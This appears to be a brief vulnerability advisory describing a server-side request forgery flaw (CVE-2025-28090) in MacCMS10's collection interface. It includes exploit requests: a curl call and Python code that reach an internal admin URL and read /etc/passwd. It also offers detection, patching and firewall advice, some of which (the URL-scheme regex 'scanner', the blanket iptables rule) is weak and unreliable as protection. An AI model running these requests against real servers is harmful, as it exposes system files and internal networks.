How CVE-2025-28090 Works
MacCMS10 v2025.1000.4047 fails to properly validate user-supplied URLs in the Collection Custom Interface feature. Attackers can craft malicious requests to bypass access controls and force the server to send unauthorized HTTP requests to internal or external systems. This allows data exfiltration, internal network scanning, or abuse of trusted server permissions. The vulnerability stems from insufficient input sanitization when processing `url` parameters in API endpoints, enabling SSRF via manipulated GET/POST requests.
DailyCVE Form:
Platform: MacCMS10
Version: v2025.1000.4047
Vulnerability: SSRF
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploit:
curl -X GET "http://target.com/api/collect?url=http://internal-server/admin"
import requests exploit_url = "http://target.com/api/collect?url=file:///etc/passwd" response = requests.get(exploit_url) print(response.text)
Detection:
grep -r "file_get_contents($_GET" /var/www/html/
Mitigation:
1. Patch to v2025.1000.5050 or later.
2. Implement input validation:
if (!filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_HOST_REQUIRED)) {
die("Invalid URL");
}
3. Restrict outbound requests via firewall:
iptables -A OUTPUT -p tcp --dport 80 -d 192.168.1.0/24 -j DROP
Analysis:
- CVSS 4.0 Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H`
– Exploitability: Remote, low complexity. - Impact: Confidentiality/Integrity/Availability compromise.
References:
Tooling:
nmap --script http-ssrf target.com
SSRF Scanner import re def check_ssrf(url): return re.match(r"^(http|https)://", url) and not re.match(r"^file://", url)
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28090
Extra Source Hub:
Undercode
